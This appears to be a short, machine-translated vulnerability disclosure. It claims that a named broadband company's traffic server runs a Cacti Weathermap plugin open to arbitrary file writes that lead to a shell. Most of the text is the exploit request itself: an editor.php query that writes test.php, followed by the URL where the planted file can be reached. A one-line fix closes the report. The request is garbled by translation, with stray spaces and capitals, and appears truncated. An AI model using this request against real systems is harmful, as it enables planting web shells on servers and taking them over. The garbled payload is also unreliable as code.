A substation of founder broadband has a vulnerability. You can use Getshell.
A sub-station of founder broadband
Http://traffic.founderbn.com/
Cacti installed the weathermap plug-in to write arbitrary files.
/Plugins/weathermap/editor. php? Plug = 0 & mapname = test. php & action = set_map_properties merge m = export m2 = & debug = existing & node_name = & node_x = & node_y = & node_new_name = & node_label = & node_infourl = & node_hover = & node_iconfilename = -- NONE -- & link_name = & region = & link_bandwidth_out = & link_target = & link_width = & link_infourl = & link_hover = & map_title = & map_legend = Traffic + Load & map_stamp = Created: + % B + % d + % Y + % H: % M: % S & Records = 7 & map_linkdefaultbwin = 100 M & Records = 100 M & map_width = 800 & map_height = 600 & map_pngfile = & map_htmlfile = & map_bgfile = -- NONE -- & mapstyle_linklabels = percent & mapstyle_htmlstyle = overlib & mapstyle_arrowstyle = classic & mapstyle_nodefont = 3 & mapstyle_linkfont = 2 & mapstyle_legendfont = 4 & item_configtext = Name
Http://traffic.founderbn.com/plugins/weathermap/configs/test.php
Solution:
Delete or upgrade the server to check the backdoors.